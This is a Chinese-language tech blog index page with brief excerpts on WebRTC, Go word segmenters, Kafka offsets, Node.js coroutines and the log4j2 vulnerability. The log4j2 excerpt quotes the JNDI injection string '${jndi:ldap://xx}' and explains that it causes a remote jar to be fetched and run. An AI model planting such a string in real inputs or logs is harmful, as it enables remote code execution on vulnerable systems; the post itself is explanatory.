WebRTC 协议

Posted by 夏泽民

总的来说,WebRTC现在已经覆盖所有的现代浏览器了。 https://webrtc.org.cn/webrtc-in-browsers/ peer-to-peer communications and video-conferencing in HTML covered by this specification:



sego 分词器

Posted by 夏泽民

https://github.com/huichen/sego https://github.com/yanyiwu/gojieba 后者是基于cgo的



kafka offset

Posted by 夏泽民

Kafka中的每个partition都由一系列有序的、不可变的消息组成,这些消息被连续的追加到partition中。partition中的每个消息都有一个连续的序号,用于partition唯一标识一条消息。



log4j2漏洞

Posted by 夏泽民

log4j2 漏洞就是如果日志中含有 ${jndi:ldap://xx}这样的代码,会下载远程的jar包,到本地执行,是一个非常严重的漏洞 https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/



Node.js 的协程coroutine

Posted by 夏泽民

实现 coroutine 的方式有很多,比如 ES6 的 generator,ES7 的 async/await。而 tj 大神开发的 co 模块,也是取名字 coroutine 的缩写。 coroutine 需要底层的支持,对于不支持 generator/async/await 的平台来说,需要编译为 es5 代码。



Search

Popular posts

Anything in here will be replaced on browsers that support the canvas element

Recent posts

This blog is maintained by 夏泽民

Get in touch with me at 465474307@qq.com

Subscribe to our mailing list

* indicates required